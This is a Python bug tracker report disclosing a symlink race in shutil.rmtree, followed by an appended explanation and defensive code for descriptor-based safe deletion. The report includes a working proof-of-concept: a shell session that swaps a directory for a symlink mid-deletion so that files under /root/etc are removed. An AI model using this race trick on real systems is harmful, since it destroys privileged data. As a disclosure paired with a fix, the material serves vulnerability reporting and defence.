New submission from Mart Sõmermaa <[EMAIL PROTECTED]>:

Race condition in the rmtree function in the shutil module allows local users to delete arbitrary files and directories via a symlink attack.

See also http://bugs.debian.org/286922

Attack:
---
# emulate removing /etc
$ sudo cp -a /etc /root/etc/
$ sudo python2.6
>>> for i in xrange(0, 50000):
...     with open("/root/etc/" + str(i), "w") as f:
...         f.write("0")
...
$ ls /root/etc > orig_list.txt
$ mkdir /tmp/attack
$ cp -a /root/etc/* /tmp/attack
$ sudo python2.6
>>> from shutil import rmtree
>>> rmtree('/tmp/attack')
>>> # press ctrl-z to suspend execution
^Z
[1]+  Stopped                 sudo python2.6
$ mv /tmp/attack /tmp/dummy; ln -s /root/etc /tmp/attack
$ fg
sudo python2.6
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python2.6/shutil.py", line 225, in rmtree
    onerror(os.rmdir, path, sys.exc_info())
  File "/usr/local/lib/python2.6/shutil.py", line 223, in rmtree
    os.rmdir(path)
OSError: [Errno 20] Not a directory: '/tmp/attack'
$ ls /root/etc > new_list.txt
$ diff -q orig_list.txt new_list.txt
Files orig_list.txt and new_list.txt differ
---
If the attack wasn't successful, /root/etc would not be modified and orig_list.txt and new_list.txt would be identical.

----------
components: Library (Lib)
messages: 76753
nosy: mrts
severity: normal
status: open
title: shutil.rmtree is vulnerable to a symlink attack
type: security
versions: Python 2.3, Python 2.4, Python 2.5, Python 2.6, Python 3.0

_______________________________________
Python tracker <[EMAIL PROTECTED]>
<http://bugs.python.org/issue4489>
_______________________________________
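The mitigation for the race described above, added here as an example (it is not part of the report, and not CPython's own shutil code): every unlink and rmdir is issued relative to an open directory descriptor, a symlink that appears where a directory was is refused by O_NOFOLLOW, and the opened directory's (st_dev, st_ino) is compared against the earlier lstat so a directory swapped in by rename is detected instead of descended into. This is the descriptor-based approach later Python 3 releases adopted for rmtree; the names safe_rmtree and demo and the directory layout in demo are constructed for this example, and the code assumes Linux (dir_fd support).

```python
import os
import stat
import tempfile


def _remove_entries(dir_fd):
    """Remove everything inside the directory open as dir_fd. All operations
    are relative to dir_fd, so renaming an ancestor (the report's mv + ln -s
    trick) cannot redirect them into another tree."""
    for name in os.listdir(dir_fd):
        st = os.lstat(name, dir_fd=dir_fd)
        if not stat.S_ISDIR(st.st_mode):
            os.unlink(name, dir_fd=dir_fd)  # files and symlinks: never followed
            continue
        # O_NOFOLLOW rejects a symlink swapped in since the lstat above
        child = os.open(name, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY, dir_fd=dir_fd)
        try:
            cst = os.fstat(child)
            if (cst.st_dev, cst.st_ino) != (st.st_dev, st.st_ino):
                raise OSError("directory replaced during removal: " + name)
            _remove_entries(child)
        finally:
            os.close(child)
        os.rmdir(name, dir_fd=dir_fd)


def safe_rmtree(path):
    """Delete a directory tree; a symlink at the top level is refused by the open."""
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW | os.O_DIRECTORY)
    try:
        _remove_entries(fd)
    finally:
        os.close(fd)
    os.rmdir(path)


def demo():
    """Constructed layout (not from the report): a tree holding a symlink to a victim dir."""
    base = tempfile.mkdtemp()
    victim = os.path.join(base, "victim")
    os.mkdir(victim)
    open(os.path.join(victim, "keep.txt"), "w").close()
    target = os.path.join(base, "attack")
    os.makedirs(os.path.join(target, "sub"))
    open(os.path.join(target, "sub", "junk"), "w").close()
    os.symlink(victim, os.path.join(target, "link_to_victim"))
    safe_rmtree(target)
    result = (not os.path.lexists(target), os.path.exists(os.path.join(victim, "keep.txt")))
    safe_rmtree(base)  # cleanup: the victim directory goes only now, by explicit request
    return result
```

demo() returns (True, True): the tree is gone, and the file behind the symlink survives because the link was unlinked rather than followed.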